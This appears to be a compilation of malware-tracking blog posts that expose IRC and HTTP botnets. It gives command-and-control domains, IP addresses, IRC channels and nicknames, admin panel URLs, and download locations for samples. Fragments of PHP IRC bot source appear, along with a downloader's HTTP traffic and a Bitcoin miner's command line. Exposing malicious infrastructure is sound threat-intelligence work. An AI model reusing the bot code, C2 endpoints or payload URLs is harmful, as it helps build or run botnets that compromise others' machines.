Sample here. UFR Stealer admin panel: www.kavalier2012.ru/gate/ufr.php
hosting infos: http://whois.domaintools.com/195.3.146.46
o.ksah4ck.com (IRC botnet hosted in United States, Ft. Wayne, Comcast Business Communications Llc)
Resolved : [o.ksah4ck.com] To [70.88.160.105]
Resolved : [o.ksah4ck.com] To [66.41.211.152]
Remote Host Port Number
66.41.211.152 3921
NICK [0]USA|XP-SP2[P]552515
USER [0]USA|XP-SP2[P]552515 "localhost" "o.ksah4ck.com" :Notepad.
JOIN #errorz
hosting infos: http://whois.domaintools.com/70.88.160.105
v1.0 Ultimate phpB (Linux bots hosted in Brazil, Comite Gestor Da Internet No Brasil)
Albanian hacker using PHP bots to flood IRC channels.

#####################################################################
# v1.0 Ultimate phpB. Enjoy ! ! ! ! !                               #
#                                                                   #
#                        Fixed By TiRoNcI_BoY®                      #
#                          Albhack@msn.com                          #
#####################################################################
<?
set_time_limit(0);
error_reporting(0);
class pBot {
####################### V1.0 CONFIGURATION ########################
var $config = array("server"=>"189.30.30.10", #
                    "port"=>6667, //server port
#
irc.ganyot.us.to (Linux bots hosted in Korea, Republic Of, Seoul, Hanbiro)
I found this link http://focori.com.br/images/x.php; it was a PHP shell uploaded to a vulnerable site. Inside I found the bot used for exploiting vulnerable sites.

<?
/*
 *
 * NOGROD. since 2008
 * IRC.UDPLINK.NET
 *
 * COMMANDS:
 *
 * .user <password>   //login to the bot
 * .logout            //logout of the bot
 * .die               //kill the bot
cube.sdeirc.net (ngrBot hosted in Netherlands, Amsterdam, Ecatel Ltd)
Our anonymous friend pointed out this URL http://cbteam.ws/ (inside you have samples). I checked the files and found this botnet, which I already posted IPs for in the blog.

Resolved : [cube.sdeirc.net] To [89.248.166.139]
Remote Host Port Number
cube.sdeirc.net 7392
PASS none
NICK New{US-XP-x86}1124207
USER 1124207 "" "1124207" :1124207
MODE New{US-XP-x86}1124207 +iMmx
JOIN #a secret
JOIN #rndbot zrag
LilyJade Software (malware downloader hosted in United States, Redmond, Microsoft Corp)
Got the sample from our anonymous friend and here is what it does:

1. Downloads the file installer.gif

GET /installer.gif?action=started&browser=ie6&ver=1_16_149_149&bic=66583225931340E1B463893B68AD2174IE&app=4761&appver=0&verifier=eb9f1208f7e0fabe1db48c4f79a1fbad&srcid=0&subid=0&zdata=0&ff=1&ch=1&default=X&os=XP&admin=1&type=14337 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: stats.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache

2. Downloads and installs a fake Chrome

The data identified by the following URLs was then requested from the remote web server:
http://o-o.preferred.xo-ord1.v9.lscache2.c.pack.google.com/edgedl/chrome/install/1123.1/chrome_installer.exe?cms_redirect=yes
http://crt.usertrust.com/AddTrustExternalCARoot.p7c
http://app-static.crossrider.com/plugin/apps/4761/plugins/1_16_149_149/ie6/plugins.json?ver=2
http://app-static.crossrider.com/plugin/opensearch/ie/4761.xml
http://cotssl.crossrider.com/plugin/apps/4761/manifest/1_16_149_149/ie6/manifest.xml?ver=0
http://crl.verisign.com/pca3.crl
http://crl.verisign.com/ThawteTimestampingCA.crl
vps.modtech360.info (ngrBot hosted in Netherlands, Amsterdam, Snel Internet Services B.v)
Botnet found by our anonymous friend; this one is Mystical's botnet again.
Server: vps.modtech360.info:6664
Channel: #Boss
sample hosting infos: http://whois.domaintools.com/128.204.202.126
queerbag.com (Andromeda Bot hosted in France, Paris, Ovh Systems)
Samples were provided by this anonymous guy in this post: http://www.exposedbotnets.com/2012/04/img196-imageshackushttp-malware-hosted.html
Resolved : [queerbag.com] To [188.165.212.101]
Control panel here: http://queerbag.com/jow1z/ (you need user:pass to log in)
Two exe samples are in this directory: http://queerbag.com/bot/
ourbot.exe connects to port 8000 tcp
UPDATE: There is another domain name used by this file:
Resolved : [ugnazi.com] To [176.31.237.84]
here
aaa1adasadasda444.net (Andromeda HTTP Bot hosted in Czech Republic, Prague, Casablanca Int)
This is one of the samples uploaded by our anonymous friend in this post: http://www.exposedbotnets.com/2012/04/img196-imageshackushttp-malware-hosted.html
Resolved : [aaa1adasadasda444.net] To [217.11.251.173]
The control panel is here: aaa1adasadasda444.net/admin/image.php
Credit goes to the anonymous guy for providing the samples.
hosting infos: http://whois.domaintools.com/217.11.251.173
eu.triplemining.com (Bitcoin Miner malware hosted in Belgium, Ict Ventures Bvba/sprl)
This is the second Belgian hoster found hosting malware; that's not good, lol. Again another great contribution from our anonymous friend, which I called malware because it uses infected machines to do what he does. The bitcoin miner is downloaded from here: gwassnet.co.cc/NoTouch.exe
It connects to:
svchost2.exe -o http://eu.triplemining.com:8344 -u trap258_gwas -p himom 111 0